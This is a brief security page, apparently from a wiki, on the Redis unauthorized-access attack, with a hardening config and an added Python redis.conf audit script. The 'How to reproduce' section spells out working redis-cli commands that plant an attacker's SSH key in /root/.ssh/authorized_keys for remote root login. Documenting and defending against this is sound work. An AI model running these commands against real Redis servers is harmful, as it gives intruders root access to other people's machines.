Redis Hack

Remote login

How to reproduce

$ ssh-keygen -t rsa
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save

How to avoid

# redis.conf
# prevent dbfilename from being changed over a remote connection
rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""
requirepass mypassword
bind 127.0.0.1

# create a dedicated non-root system user and group for redis
groupadd -r redis && useradd -r -g redis redis
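
An added example, not part of the original page: a small Python audit that checks a redis.conf for the settings listed under "How to avoid". The function names and the two sample configs are constructed for illustration.

```python
import ipaddress
import shlex

DISABLE = ("FLUSHALL", "CONFIG", "EVAL")  # commands the page renames to ""

def parse(text):
    """Yield (directive, args) per redis.conf line, skipping blanks and comments."""
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            parts = shlex.split(line)  # keeps a quoted "" as an empty argument
            yield parts[0].lower(), parts[1:]

def is_loopback(addr):
    try:
        return ipaddress.ip_address(addr.lstrip("-")).is_loopback
    except ValueError:  # "*", hostnames, anything unparsable
        return False

def audit(text):
    """Return findings for the settings listed above; empty list means all present."""
    entries = list(parse(text))
    findings = []
    disabled = {a[0].upper() for d, a in entries
                if d == "rename-command" and len(a) == 2 and a[1] == ""}
    findings += [f"{c} not disabled" for c in DISABLE if c not in disabled]
    # Assumption: a later requirepass line overrides an earlier one.
    passwords = [a[0] for d, a in entries if d == "requirepass" and a]
    if not passwords or not passwords[-1]:
        findings.append("requirepass not set")
    binds = [addr for d, a in entries if d == "bind" for addr in a]
    if not binds:
        findings.append("no bind directive")
    findings += [f"bind {b} is not loopback" for b in binds if not is_loopback(b)]
    return findings

# Constructed sample inputs (not taken from a real host).
HARDENED = '''
# redis.conf
rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""
requirepass mypassword
bind 127.0.0.1
'''
EXPOSED = '''
bind 0.0.0.0
rename-command FLUSHALL ""
'''

if __name__ == "__main__":
    for name, conf in (("hardened", HARDENED), ("exposed", EXPOSED)):
        print(name, audit(conf) or "ok")
```
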
Last modified 2023-03-11: split into more parts (54b443e)